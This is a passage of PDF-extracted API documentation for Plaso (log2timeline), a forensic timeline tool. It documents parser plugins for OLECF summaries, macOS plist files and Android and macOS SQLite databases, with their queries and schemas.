Plugin to parse the OLECF summary/document summary information items. class plaso.parsers.olecf_plugins.summary.DocumentSummaryInformationOLECFPlugin Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin Plugin that parses DocumentSummaryInformation item from an OLECF file. DATA_FORMAT = 'Document summary information (\\0x05DocumentSummaryInformation)' NAME = 'olecf_document_summary' Process(parser_mediator, root_item=None, **kwargs) Extracts events from a document summary information OLECF item. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • root_item (Optional[pyolecf.item]) – root item of the OLECF file. Raises ValueError – If the root item is not set. REQUIRED_ITEMS = frozenset({'\x05DocumentSummaryInformation'}) class plaso.parsers.olecf_plugins.summary.OLECFDocumentSummaryInformation(olecf_item) Bases: plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream OLECF Document Summary information property set. class plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream(olecf_item) Bases: object OLECF property set stream. date_time_properties date and time properties and values. Type dict[str, dfdatetime.DateTimeValues] GetEventData() Retrieves the properties as event data. Returns event data. Return type EventData class plaso.parsers.olecf_plugins.summary.OLECFSummaryInformation(olecf_item) Bases: plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream OLECF Summary information property set. class plaso.parsers.olecf_plugins.summary.SummaryInformationOLECFPlugin Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin Plugin that parses the SummaryInformation item from an OLECF file. DATA_FORMAT = 'Summary information (\\0x05SummaryInformation) (top-level only)' NAME = 'olecf_summary'

5.1. Subpackages 231 Plaso (log2timeline), Release 20210606

Process(parser_mediator, root_item=None, **kwargs) Extracts events from a summary information OLECF item. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • root_item (Optional[pyolecf.item]) – root item of the OLECF file. Raises ValueError – If the root item is not set. REQUIRED_ITEMS = frozenset({'\x05SummaryInformation'})

Module contents

This file contains an import statement for each OLECF plugin. plaso.parsers.plist_plugins package

Submodules plaso.parsers.plist_plugins.airport module

Plist parser plugin for Airport plist files. class plaso.parsers.plist_plugins.airport.AirportPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Airport plist files. DATA_FORMAT = 'Airport plist file' NAME = 'airport' PLIST_KEYS = frozenset({'RememberedNetworks'}) PLIST_PATH_FILTERS = frozenset({}) plaso.parsers.plist_plugins.appleaccount module

Plist parser plugin for Apple Account plist files. class plaso.parsers.plist_plugins.appleaccount.AppleAccountPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Apple Account plist files. Further details about fields within the key: Accounts: account name. FirstName: first name associated with the account. LastName: family name associate with the account. CreationDate: timestamp when the account was configured in the system. LastSuccessfulConnect: last time when the account was connected. ValidationDate: last time when the account was validated. DATA_FORMAT = 'Apple account information plist file' NAME = 'apple_id' PLIST_KEYS = frozenset({'AccessorVersions', 'Accounts', 'AuthCertificates'})

232 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

PLIST_PATH_FILTERS = frozenset({})

plaso.parsers.plist_plugins.bluetooth module

Plist parser plugin for Bluetooth plist files. class plaso.parsers.plist_plugins.bluetooth.BluetoothPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Bluetooth plist files. Additional details about the fields. LastInquiryUpdate: Device connected via Bluetooth Discovery. Updated when a device is detected in discovery mode. E.g. BT headphone power on. Pairing is not required for a device to be discovered and cached. LastNameUpdate: When the human name was last set. Usually done only once during initial setup. LastServicesUpdate: Time set when device was polled to determine what it is. Usually done at setup or manually requested via advanced menu. DATA_FORMAT = 'Bluetooth plist file' NAME = 'macosx_bluetooth' PLIST_KEYS = frozenset({'DeviceCache', 'PairedDevices'}) PLIST_PATH_FILTERS = frozenset({})

plaso.parsers.plist_plugins.default module

Default plist parser plugin. class plaso.parsers.plist_plugins.default.DefaultPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Default plist parser plugin. DATA_FORMAT = 'plist file' NAME = 'plist_default' plaso.parsers.plist_plugins.install_history module

Plist parser plugin for MacOS install history plist files. class plaso.parsers.plist_plugins.install_history.InstallHistoryPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for MacOS install history plist files. DATA_FORMAT = 'MacOS installation history plist file' NAME = 'macosx_install_history' PLIST_KEYS = frozenset({'date', 'displayName', 'displayVersion', 'packageIdentifiers', 'processName'})

5.1. Subpackages 233 Plaso (log2timeline), Release 20210606

PLIST_PATH_FILTERS = frozenset({}) plaso.parsers.plist_plugins.interface module

Interface for plist parser plugins. Plist files are only one example of a type of object that the Plaso tool is expected to encounter and process.Therecan be and are many other parsers which are designed to process specific data types. PlistPlugin defines the attributes necessary for registration, discovery and operation of plugins for plist files whichwill be used by PlistParser. class plaso.parsers.plist_plugins.interface.PlistPathFilter(filename) Bases: object The plist path filter. Match(filename_lower_case) Determines if a plist filename matches the filter. Note that this method does a case insensitive comparison. Parameters filename_lower_case (str) – filename of the plist in lower case. Returns True if the filename matches the filter. Return type bool class plaso.parsers.plist_plugins.interface.PlistPlugin Bases: plaso.parsers.plugins.BasePlugin This is an abstract class from which plugins should be based. The following are the attributes and methods expected to be overridden by a plugin. PLIST_PATH_FILTERS plist path filters that should match for the plugin to process the plist. Type set[PlistPathFilter] PLIST_KEY keys holding values that are necessary for processing. Type set[str] Please note, PLIST_KEY is case sensitive and for a plugin to match a plist file needs to contain at minimum the number of keys needed for processing. For example if a Plist file contains the following keys, {‘foo’: 1, ‘bar’: 2, ‘opt’: 3} with ‘foo’ and ‘bar’ being keys critical to processing define PLIST_KEY as [‘foo’, ‘bar’]. If ‘opt’ is only optionally defined it canstillbe accessed by manually processing self.top_level from the plugin. NAME = 'plist_plugin' PLIST_KEYS = frozenset({'any'}) PLIST_PATH_FILTERS = frozenset({}) Process(parser_mediator, top_level=None, **kwargs) Extracts events from a plist file. Parameters

234 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • top_level (Optional[dict[str, object]]) – plist top-level item. class plaso.parsers.plist_plugins.interface.PrefixPlistPathFilter(filename) Bases: plaso.parsers.plist_plugins.interface.PlistPathFilter The prefix plist path filter. Match(filename_lower_case) Determines if a plist filename matches the filter. Note that this method does a case insensitive comparison. Parameters filename_lower_case (str) – filename of the plist in lower case. Returns True if the filename matches the filter. Return type bool

plaso.parsers.plist_plugins.ipod module

Plist parser plugin for iPod, iPad and iPhone storage plist files. class plaso.parsers.plist_plugins.ipod.IPodPlistEventData Bases: plaso.containers.events.EventData iPod plist event data. device_id unique identifier of the iPod device. Type str DATA_TYPE = 'ipod:device:entry' class plaso.parsers.plist_plugins.ipod.IPodPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for iPod, iPad and iPhone storage plist files. DATA_FORMAT = 'iPod, iPad and iPhone plist file' NAME = 'ipod_device' PLIST_KEYS = frozenset({'Devices'}) PLIST_PATH_FILTERS = frozenset({})

plaso.parsers.plist_plugins.launchd module

Plist parser plugin for launchd plist files. class plaso.parsers.plist_plugins.launchd.LaunchdPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for launchd plist files. Further details about fields within the key: Label: the required key for uniquely identifying the launchd service.

5.1. Subpackages 235 Plaso (log2timeline), Release 20210606

Program: absolute path to the executable. required in the absence of the ProgramArguments key. ProgramArguments: command-line flags for the executable. required in the absence of the Program key. UserName: the job run as the specified user. GroupName: the job run as the specified group. DATA_FORMAT = 'Launchd plist file' NAME = 'launchd_plist' PLIST_KEYS = frozenset({'GroupName', 'Label', 'Program', 'ProgramArguments', 'UserName'}) plaso.parsers.plist_plugins.macuser module

Plist parser plugin for MacOS user plist files. class plaso.parsers.plist_plugins.macuser.MacUserPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for MacOS user plist files. Further details about the extracted fields. name: string with the system user. uid: user ID. passwordpolicyoptions: XML Plist structures with the timestamp. passwordLastSetTime: last time the password was changed. lastLoginTimestamp: last time the user was authenticated depending on the situation, these timestamps are reset (0 value). It is translated by the library as a 2001-01-01 00:00:00 (Cocoa zero time representation). If this happens, the event is not yield. failedLoginTimestamp: last time the user passwd was incorrectly(*). failedLoginCount: times of incorrect passwords. DATA_FORMAT = 'MacOS user plist file' NAME = 'macuser' PLIST_KEYS = frozenset({'ShadowHashData', 'home', 'name', 'passwordpolicyoptions', 'uid'}) plaso.parsers.plist_plugins.safari module

Plist parser plugin for Safari history plist files. class plaso.parsers.plist_plugins.safari.SafariHistoryEventData Bases: plaso.containers.events.EventData Safari history event data. display_title display title of the webpage visited. Type str

236 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

title title of the webpage visited. Type str url URL visited. Type str visit_count number of times the website was visited. Type int was_http_non_get True if the webpage was visited using a non-GET HTTP request. Type bool DATA_TYPE = 'safari:history:visit' class plaso.parsers.plist_plugins.safari.SafariHistoryPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Safari history plist files. DATA_FORMAT = 'Safari history plist file' NAME = 'safari_history' PLIST_KEYS = frozenset({'WebHistoryDates', 'WebHistoryFileVersion'}) PLIST_PATH_FILTERS = frozenset({}) plaso.parsers.plist_plugins.softwareupdate module

Plist parser plugin for MacOS software update plist files. class plaso.parsers.plist_plugins.softwareupdate.SoftwareUpdatePlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for MacOS software update plist files. Further details about the extracted fields: LastFullSuccessfulDate: timestamp when MacOS was full update. LastSuccessfulDate: timestamp when MacOS was partially update. DATA_FORMAT = 'MacOS software update plist file' NAME = 'macos_software_update' PLIST_KEYS = frozenset({'LastAttemptSystemVersion', 'LastFullSuccessfulDate', 'LastRecommendedUpdatesAvailable', 'LastSuccessfulDate', 'LastUpdatesAvailable', 'RecommendedUpdates'}) PLIST_PATH_FILTERS = frozenset({})

5.1. Subpackages 237 Plaso (log2timeline), Release 20210606

plaso.parsers.plist_plugins.spotlight module

Plist parser plugin for Spotlight searched terms plist files. class plaso.parsers.plist_plugins.spotlight.SpotlightPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Spotlight searched terms plist files. Further information about extracted fields: name of the item: search term. PATH: path of the program associated to the term. LAST_USED: last time when it was executed. DISPLAY_NAME: the display name of the program associated. DATA_FORMAT = 'Spotlight plist file' NAME = 'spotlight' PLIST_KEYS = frozenset({'UserShortcuts'}) PLIST_PATH_FILTERS = frozenset({}) plaso.parsers.plist_plugins.spotlight_volume module

Plist parser plugin for Spotlight volume configuration plist files. class plaso.parsers.plist_plugins.spotlight_volume.SpotlightVolumePlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Spotlight volume configuration plist files. DATA_FORMAT = 'Spotlight volume configuration plist file' NAME = 'spotlight_volume' PLIST_KEYS = frozenset({'Stores'}) PLIST_PATH_FILTERS = frozenset({}) plaso.parsers.plist_plugins.timemachine module

Plist parser plugin for TimeMachine plist files. class plaso.parsers.plist_plugins.timemachine.TimeMachinePlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin, plaso.lib.dtfabric_helper. DtFabricHelper Plist parser plugin for TimeMachine plist files. Further details about the extracted fields: DestinationID: remote UUID hard disk where the backup is done. BackupAlias: structure that contains the extra information from the destinationID. SnapshotDates: list of the backup dates.

238 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

DATA_FORMAT = 'TimeMachine plist file' NAME = 'time_machine' PLIST_KEYS = frozenset({'Destinations', 'RootVolumeUUID'}) PLIST_PATH_FILTERS = frozenset({})

Module contents

Imports for the plist parser plugins. plaso.parsers.shared package

Submodules plaso.parsers.shared.shell_items module

Parser for Windows NT shell items. class plaso.parsers.shared.shell_items.ShellItemsParser(origin) Bases: object Parses for Windows NT shell items. CopyToPath() Copies the shell items to a path. Returns converted shell item list path or None. Return type str GetUpperPathSegment() Retrieves the upper shell item path segment. Returns shell item path segment or “N/A”. Return type str NAME = 'shell_items' ParseByteStream(parser_mediator, byte_stream, parent_path_segments=None, codepage='cp1252') Parses the shell items from the byte stream. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • byte_stream (bytes) – shell items data. • parent_path_segments (Optional[list[str]]) – parent shell item path segments. • codepage (Optional[str]) – byte stream codepage.

5.1. Subpackages 239 Plaso (log2timeline), Release 20210606

Module contents plaso.parsers.sqlite_plugins package

Submodules plaso.parsers.sqlite_plugins.android_calls module

SQLite parser plugin for Android call history database files. class plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventData Bases: plaso.containers.events.EventData Android Call event data. call_type type of call, such as: Incoming, Outgoing, or Missed. Type str duration number of seconds the call lasted. Type int name name associated to the remote party. Type str number phone number associated to the remote party. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str DATA_TYPE = 'android:event:call' class plaso.parsers.sqlite_plugins.android_calls.AndroidCallPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Android call history database files. The Android call history database file is typically stored in: contacts2.db CALL_TYPE = {1: 'INCOMING', 2: 'OUTGOING', 3: 'MISSED'} DATA_FORMAT = 'Android call history SQLite database (contacts2.db) file' NAME = 'android_calls' ParseCallsRow(parser_mediator, query, row, **unused_kwargs) Parses a Call record row. Parameters

240 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT _id AS id, date, number, name, duration, type FROM calls', 'ParseCallsRow')] REQUIRED_STRUCTURE = {'calls': frozenset({'_id', 'date', 'duration', 'name', 'number', 'type'})}

5.1. Subpackages 241 Plaso (log2timeline), Release 20210606

SCHEMAS = [{'_sync_state': 'CREATE TABLE _sync_state (_id INTEGER PRIMARY KEY, account_name TEXT NOT NULL, account_type TEXT NOT NULL, data TEXT, UNIQUE(account_name, account_type))', '_sync_state_metadata': 'CREATE TABLE _sync_state_metadata (version INTEGER)', 'accounts': 'CREATE TABLE accounts (_id INTEGER PRIMARY KEY AUTOINCREMENT, account_name TEXT, account_type TEXT, data_set TEXT)', 'agg_exceptions': 'CREATE TABLE agg_exceptions (_id INTEGER PRIMARY KEY AUTOINCREMENT, type INTEGER NOT NULL, raw_contact_id1 INTEGER REFERENCES raw_contacts(_id), raw_contact_id2 INTEGER REFERENCES raw_contacts(_id))', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'calls': 'CREATE TABLE calls (_id INTEGER PRIMARY KEY AUTOINCREMENT, number TEXT, date INTEGER, duration INTEGER, type INTEGER, new INTEGER, name TEXT, numbertype INTEGER, numberlabel TEXT, countryiso TEXT, voicemail_uri TEXT, is_read INTEGER, geocoded_location TEXT, lookup_uri TEXT, matched_number TEXT, normalized_number TEXT, photo_id INTEGER NOT NULL DEFAULT 0, formatted_number TEXT, _data TEXT, has_content INTEGER, mime_type TEXT, source_data TEXT, source_package TEXT, state INTEGER)', 'contacts': 'CREATE TABLE contacts (_id INTEGER PRIMARY KEY AUTOINCREMENT, name_raw_contact_id INTEGER REFERENCES raw_contacts(_id), photo_id INTEGER REFERENCES data(_id), photo_file_id INTEGER REFERENCES photo_files(_id), custom_ringtone TEXT, send_to_voicemail INTEGER NOT NULL DEFAULT 0, times_contacted INTEGER NOT NULL DEFAULT 0, last_time_contacted INTEGER, starred INTEGER NOT NULL DEFAULT 0, has_phone_number INTEGER NOT NULL DEFAULT 0, lookup TEXT, status_update_id INTEGER REFERENCES data(_id), contact_last_updated_timestamp INTEGER)', 'data': 'CREATE TABLE data (_id INTEGER PRIMARY KEY AUTOINCREMENT, package_id INTEGER REFERENCES package(_id), mimetype_id INTEGER REFERENCES mimetype(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, is_read_only INTEGER NOT NULL DEFAULT 0, is_primary INTEGER NOT NULL DEFAULT 0, is_super_primary INTEGER NOT NULL DEFAULT 0, data_version INTEGER NOT NULL DEFAULT 0, data1 TEXT, data2 TEXT, data3 TEXT, data4 TEXT, data5 TEXT, data6 TEXT, data7 TEXT, data8 TEXT, data9 TEXT, data10 TEXT, data11 TEXT, data12 TEXT, data13 TEXT, data14 TEXT, data15 TEXT, data_sync1 TEXT, data_sync2 TEXT, data_sync3 TEXT, data_sync4 TEXT )', 'data_usage_stat': 'CREATE TABLE data_usage_stat(stat_id INTEGER PRIMARY KEY AUTOINCREMENT, data_id INTEGER NOT NULL, usage_type INTEGER NOT NULL DEFAULT 0, times_used INTEGER NOT NULL DEFAULT 0, last_time_used INTEGER NOT NULL DEFAULT 0, FOREIGN KEY(data_id) REFERENCES data(_id))', 'default_directory': 'CREATE TABLE default_directory (_id INTEGER PRIMARY KEY)', 'deleted_contacts': 'CREATE TABLE deleted_contacts (contact_id INTEGER PRIMARY KEY, contact_deleted_timestamp INTEGER NOT NULL default 0)', 'directories': 'CREATE TABLE directories(_id INTEGER PRIMARY KEY AUTOINCREMENT, packageName TEXT NOT NULL, authority TEXT NOT NULL, typeResourceId INTEGER, typeResourceName TEXT, accountType TEXT, accountName TEXT, displayName TEXT, exportSupport INTEGER NOT NULL DEFAULT 0, shortcutSupport INTEGER NOT NULL DEFAULT 0, photoSupport INTEGER NOT NULL DEFAULT 0)', 'groups': 'CREATE TABLE groups (_id INTEGER PRIMARY KEY AUTOINCREMENT, package_id INTEGER REFERENCES package(_id), account_name STRING DEFAULT NULL, account_type STRING DEFAULT NULL, data_set STRING DEFAULT NULL, sourceid TEXT, version INTEGER NOT NULL DEFAULT 1, dirty INTEGER NOT NULL DEFAULT 0, title TEXT, title_res INTEGER, notes TEXT, system_id TEXT, deleted INTEGER NOT NULL DEFAULT 0, group_visible INTEGER NOT NULL DEFAULT 0, should_sync INTEGER NOT NULL DEFAULT 1, auto_add INTEGER NOT NULL DEFAULT 0, favorites INTEGER NOT NULL DEFAULT 0, group_is_read_only INTEGER NOT NULL DEFAULT 0, sync1 TEXT, sync2 TEXT, sync3 TEXT, sync4 TEXT , account_id INTEGER REFERENCES accounts(_id))', 'mimetypes': 'CREATE TABLE mimetypes (_id INTEGER PRIMARY KEY AUTOINCREMENT, mimetype TEXT NOT NULL)', 'name_lookup': 'CREATE TABLE name_lookup (data_id INTEGER REFERENCES data(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, normalized_name TEXT NOT NULL, name_type INTEGER NOT NULL, PRIMARY KEY (data_id, normalized_name, name_type))', 'nickname_lookup': 'CREATE TABLE nickname_lookup (name TEXT, cluster TEXT)', 'packages': 'CREATE TABLE packages (_id INTEGER PRIMARY KEY AUTOINCREMENT, 242 package TEXT NOT NULL)', 'phone_lookup': 'CREATE TABLE phone_lookupChapter 5. (data_id plaso package INTEGER REFERENCES data(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, normalized_number TEXT NOT NULL, min_match TEXT NOT NULL)', 'photo_files': 'CREATE TABLE photo_files (_id INTEGER PRIMARY KEY AUTOINCREMENT, height INTEGER NOT NULL, width INTEGER NOT NULL, filesize INTEGER NOT NULL)', 'properties': 'CREATE TABLE properties (property_key TEXT PRIMARY KEY, property_value TEXT )'}] Plaso (log2timeline), Release 20210606 plaso.parsers.sqlite_plugins.android_sms module

SQLite parser plugin for Android text messages (SMS) database files. class plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventData Bases: plaso.containers.events.EventData Android SMS event data. address phone number associated to the sender or receiver. Type str body content of the SMS text message. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str sms_read message read status, either Read or Unread. Type str sms_type message type, either Sent or Received. Type str DATA_TYPE = 'android:messaging:sms' class plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Android text messages (SMS) database files. The Android text messages (SMS) database file is typically stored in: mmssms.dbs DATA_FORMAT = 'Android text messages (SMS) SQLite database (mmssms.dbs) file' NAME = 'android_sms' ParseSmsRow(parser_mediator, query, row, **unused_kwargs) Parses an SMS row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT _id AS id, address, date, read, type, body FROM sms', 'ParseSmsRow')]

5.1. Subpackages 243 Plaso (log2timeline), Release 20210606

REQUIRED_STRUCTURE = {'sms': frozenset({'_id', 'address', 'body', 'date', 'read', 'type'})} SCHEMAS = [{'addr': 'CREATE TABLE addr (_id INTEGER PRIMARY KEY, msg_id INTEGER, contact_id INTEGER, address TEXT, type INTEGER, charset INTEGER)', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'attachments': 'CREATE TABLE attachments (sms_id INTEGER, content_url TEXT, offset INTEGER)', 'canonical_addresses': 'CREATE TABLE canonical_addresses (_id INTEGER PRIMARY KEY AUTOINCREMENT, address TEXT)', 'drm': 'CREATE TABLE drm (_id INTEGER PRIMARY KEY, _data TEXT)', 'part': 'CREATE TABLE part (_id INTEGER PRIMARY KEY AUTOINCREMENT, mid INTEGER, seq INTEGER DEFAULT 0, ct TEXT, name TEXT, chset INTEGER, cd TEXT, fn TEXT, cid TEXT, cl TEXT, ctt_s INTEGER, ctt_t TEXT, _data TEXT, text TEXT)', 'pd': 'CREATE TABLE pdu (_id INTEGER PRIMARY KEY AUTOINCREMENT, thread_id INTEGER, date INTEGER, date_sent INTEGER DEFAULT 0, msg_box INTEGER, read INTEGER DEFAULT 0, m_id TEXT, sub TEXT, sub_cs INTEGER, ct_t TEXT, ct_l TEXT, exp INTEGER, m_cls TEXT, m_type INTEGER, v INTEGER, m_size INTEGER, pri INTEGER, rr INTEGER, rpt_a INTEGER, resp_st INTEGER, st INTEGER, tr_id TEXT, retr_st INTEGER, retr_txt TEXT, retr_txt_cs INTEGER, read_status INTEGER, ct_cls INTEGER, resp_txt TEXT, d_tm INTEGER, d_rpt INTEGER, locked INTEGER DEFAULT 0, seen INTEGER DEFAULT 0, text_only INTEGER DEFAULT 0)', 'pending_msgs': 'CREATE TABLE pending_msgs (_id INTEGER PRIMARY KEY, proto_type INTEGER, msg_id INTEGER, msg_type INTEGER, err_type INTEGER, err_code INTEGER, retry_index INTEGER NOT NULL DEFAULT 0, due_time INTEGER, last_try INTEGER)', 'rate': 'CREATE TABLE rate (sent_time INTEGER)', 'raw': 'CREATE TABLE raw (_id INTEGER PRIMARY KEY, date INTEGER, reference_number INTEGER, count INTEGER, sequence INTEGER, destination_port INTEGER, address TEXT, pdu TEXT)', 'sms': 'CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, address TEXT, person INTEGER, date INTEGER, date_sent INTEGER DEFAULT 0, protocol INTEGER, read INTEGER DEFAULT 0, status INTEGER DEFAULT -1, type INTEGER, reply_path_present INTEGER, subject TEXT, body TEXT, service_center TEXT, locked INTEGER DEFAULT 0, error_code INTEGER DEFAULT 0, seen INTEGER DEFAULT 0)', 'sr_pending': 'CREATE TABLE sr_pending (reference_number INTEGER, action TEXT, data TEXT)', 'threads': 'CREATE TABLE threads (_id INTEGER PRIMARY KEY AUTOINCREMENT, date INTEGER DEFAULT 0, message_count INTEGER DEFAULT 0, recipient_ids TEXT, snippet TEXT, snippet_cs INTEGER DEFAULT 0, read INTEGER DEFAULT 1, type INTEGER DEFAULT 0, error INTEGER DEFAULT 0, has_attachment INTEGER DEFAULT 0)', 'words': 'CREATE VIRTUAL TABLE words USING FTS3 (_id INTEGER PRIMARY KEY, index_text TEXT, source_id INTEGER, table_to_use INTEGER)', 'words_content': "CREATE TABLE 'words_content'(docid INTEGER PRIMARY KEY, 'c0_id', 'c1index_text', 'c2source_id', 'c3table_to_use')", 'words_segdir': "CREATE TABLE 'words_segdir'(level INTEGER, idx INTEGER, start_block INTEGER, leaves_end_block INTEGER, end_block INTEGER, root BLOB, PRIMARY KEY(level, idx))", 'words_segments': "CREATE TABLE 'words_segments'(blockid INTEGER PRIMARY KEY, block BLOB)"}] SMS_READ = {0: 'UNREAD', 1: 'READ'} SMS_TYPE = {1: 'RECEIVED', 2: 'SENT'}

244 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.sqlite_plugins.android_webview module

SQLite parser plugin for Android WebView database files. class plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventData Bases: plaso.containers.events.EventData Android WebView cookie event data. cookie_name name of the cookie. Type str data data stored in the cookie. Type str host host that set the cookie. Type str offset identifier of the row, from which the event data was extracted. Type str path path for which the cookie was set. Type str query SQL query that was used to obtain the event data. Type str secure True if the cookie should only be transmitted over a secure channel. Type bool url URL of the cookie. Type str DATA_TYPE = 'webview:cookie' class plaso.parsers.sqlite_plugins.android_webview.WebViewPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Android WebView database files. DATA_FORMAT = 'Android WebView SQLite database file' NAME = 'android_webview' ParseCookieRow(parser_mediator, query, row, **unused_kwargs) Parses a row from the database. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.

5.1. Subpackages 245 Plaso (log2timeline), Release 20210606

• query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = frozenset({('SELECT _id, name, value, domain, expires, path, secure FROM cookies', 'ParseCookieRow')}) REQUIRED_STRUCTURE = {'android_metadata': frozenset({}), 'cookies': frozenset({'_id', 'domain', 'expires', 'name', 'path', 'secure', 'value'})} SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'cookies': 'CREATE TABLE cookies (_id INTEGER PRIMARY KEY, name TEXT, value TEXT, domain TEXT, path TEXT, expires INTEGER, secure INTEGER)', 'formdata': 'CREATE TABLE formdata (_id INTEGER PRIMARY KEY, urlid INTEGER, name TEXT, value TEXT, UNIQUE (urlid, name, value) ON CONFLICT IGNORE)', 'formurl': 'CREATE TABLE formurl (_id INTEGER PRIMARY KEY, url TEXT)', 'httpauth': 'CREATE TABLE httpauth (_id INTEGER PRIMARY KEY, host TEXT, realm TEXT, username TEXT, password TEXT, UNIQUE (host, realm) ON CONFLICT REPLACE)', 'password': 'CREATE TABLE password (_id INTEGER PRIMARY KEY, host TEXT, username TEXT, password TEXT, UNIQUE (host, username) ON CONFLICT REPLACE)'}] plaso.parsers.sqlite_plugins.android_webviewcache module

SQLite parser plugin for Android WebviewCache database files. class plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCacheEventData Bases: plaso.containers.events.EventData Android WebViewCache event data. content_length size of the cached content. Type int query SQL query that was used to obtain the event data. Type str url URL the content was retrieved from. Type str DATA_TYPE = 'android:webviewcache' class plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Android WebviewCache database files. DATA_FORMAT = 'Android WebViewCache SQLite database file' NAME = 'android_webviewcache' ParseRow(parser_mediator, query, row, **unused_kwargs) Parses a row from the database. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.

246 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = frozenset({('SELECT url, contentlength, expires, lastmodify FROM cache', 'ParseRow')}) REQUIRED_STRUCTURE = {'android_metadata': frozenset({}), 'cache': frozenset({'contentlength', 'expires', 'lastmodify', 'url'})} SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'cache': 'CREATE TABLE cache (_id INTEGER PRIMARY KEY, url TEXT, filepath TEXT, lastmodify TEXT, etag TEXT, expires INTEGER, expiresstring TEXT, mimetype TEXT, encoding TEXT, httpstatus INTEGER, location TEXT, contentlength INTEGER, contentdisposition TEXT, UNIQUE (url) ON CONFLICT REPLACE)'}] plaso.parsers.sqlite_plugins.appusage module

SQLite parser plugin for MacOS application usage database files. class plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for MacOS application usage database files. The MacOS application usage database is typlically stored in: /var/db/application_usage.sqlite Application usage is a SQLite database that logs down entries triggered by NSWorkspaceWillLaunchApplica- tionNotification and NSWorkspaceDidTerminateApplicationNotification NSWorkspace notifications by crankd. More information can be found here: https://github.com/google/macops/blob/master/crankd/ApplicationUsage. py DATA_FORMAT = 'MacOS application usage SQLite database (application_usage.sqlite) file' NAME = 'appusage' ParseApplicationUsageRow(parser_mediator, query, row, **unused_kwargs) Parses an application usage row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT last_time, event, bundle_id, app_version, app_path, number_times FROM application_usage ORDER BY last_time', 'ParseApplicationUsageRow')] REQUIRED_STRUCTURE = {'application_usage': frozenset({'app_path', 'app_version', 'bundle_id', 'event', 'last_time', 'number_times'})} SCHEMAS = [{'application_usage': 'CREATE TABLE application_usage (event TEXT, bundle_id TEXT, app_version TEXT, app_path TEXT, last_time INTEGER DEFAULT 0, number_times INTEGER DEFAULT 0, PRIMARY KEY (event, bundle_id))'}] class plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData Bases: plaso.containers.events.EventData

5.1. Subpackages 247 Plaso (log2timeline), Release 20210606

